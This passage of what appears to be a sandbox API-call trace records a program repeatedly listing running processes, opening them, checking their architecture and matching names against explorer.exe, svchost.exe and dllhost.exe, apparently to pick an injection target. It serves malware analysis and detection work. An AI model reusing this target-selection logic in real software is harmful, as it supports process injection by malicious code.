[0231.397] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0231.397] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0231.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0231.398] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0231.398] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0231.399] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0231.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0231.399] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.399] CloseHandle (hObject=0xd8) returned 1 [0231.399] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0231.399] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0231.399] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0231.399] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0231.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0231.400] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0231.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0231.400] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.400] CloseHandle (hObject=0xd8) returned 1 [0231.400] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0231.400] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0231.400] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0231.400] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0231.401] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0231.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0231.401] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0231.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0231.402] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.402] CloseHandle (hObject=0xd8) returned 1 [0231.402] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0231.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0231.402] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.402] CloseHandle (hObject=0xd8) returned 1 [0231.403] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0231.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0231.403] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.403] CloseHandle (hObject=0xd8) returned 1 [0231.403] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0231.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0231.404] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.404] CloseHandle (hObject=0xd8) returned 1 [0231.404] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0231.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0231.404] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.404] CloseHandle (hObject=0xd8) returned 1 [0231.404] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0231.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0231.405] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.405] CloseHandle (hObject=0xd8) returned 1 [0231.405] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0231.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0231.405] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.405] CloseHandle (hObject=0xd8) returned 1 [0231.405] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0231.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0231.406] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.406] CloseHandle (hObject=0xd8) returned 1 [0231.406] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0231.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0231.407] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.407] CloseHandle (hObject=0xd8) returned 1 [0231.407] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0231.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0231.407] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.407] CloseHandle (hObject=0xd8) returned 1 [0231.407] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0231.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0231.408] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.408] CloseHandle (hObject=0xd8) returned 1 [0231.408] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0231.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0231.408] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.408] CloseHandle (hObject=0xd8) returned 1 [0231.408] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0231.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0231.409] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.409] CloseHandle (hObject=0xd8) returned 1 [0231.409] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0231.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0231.409] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.409] CloseHandle (hObject=0xd8) returned 1 [0231.410] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0231.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0231.410] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.410] CloseHandle (hObject=0xd8) returned 1 [0231.410] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0231.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0231.411] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.411] CloseHandle (hObject=0xd8) returned 1 [0231.411] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0231.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0231.411] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.411] CloseHandle (hObject=0xd8) returned 1 [0231.411] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0231.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0231.412] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.412] CloseHandle (hObject=0xd8) returned 1 [0231.412] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0231.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0231.412] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.412] CloseHandle (hObject=0xd8) returned 1 [0231.412] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0231.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0231.413] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.413] CloseHandle (hObject=0xd8) returned 1 [0231.413] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0231.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0231.413] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.414] CloseHandle (hObject=0xd8) returned 1 [0231.414] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0231.414] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0231.415] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0231.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0231.415] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0231.415] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0231.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0231.416] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0231.416] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.416] CloseHandle (hObject=0xd8) returned 1 [0231.417] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0231.417] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0231.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0231.417] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.417] CloseHandle (hObject=0xd8) returned 1 [0231.417] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0231.417] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0231.417] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0231.417] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0231.418] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0231.418] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.418] CloseHandle (hObject=0xd8) returned 1 [0231.418] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0231.419] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.419] CloseHandle (hObject=0xd8) returned 1 [0231.419] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0231.419] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0231.420] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0231.420] CloseHandle (hObject=0xd8) returned 1 [0231.420] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.420] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0231.421] CloseHandle (hObject=0xd4) returned 1 [0231.421] Sleep (dwMilliseconds=0x3e8) [0232.457] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0232.459] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0232.459] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0232.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0232.460] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0232.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0232.460] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0232.461] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0232.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0232.461] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0232.462] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0232.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0232.462] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0232.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0232.462] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, 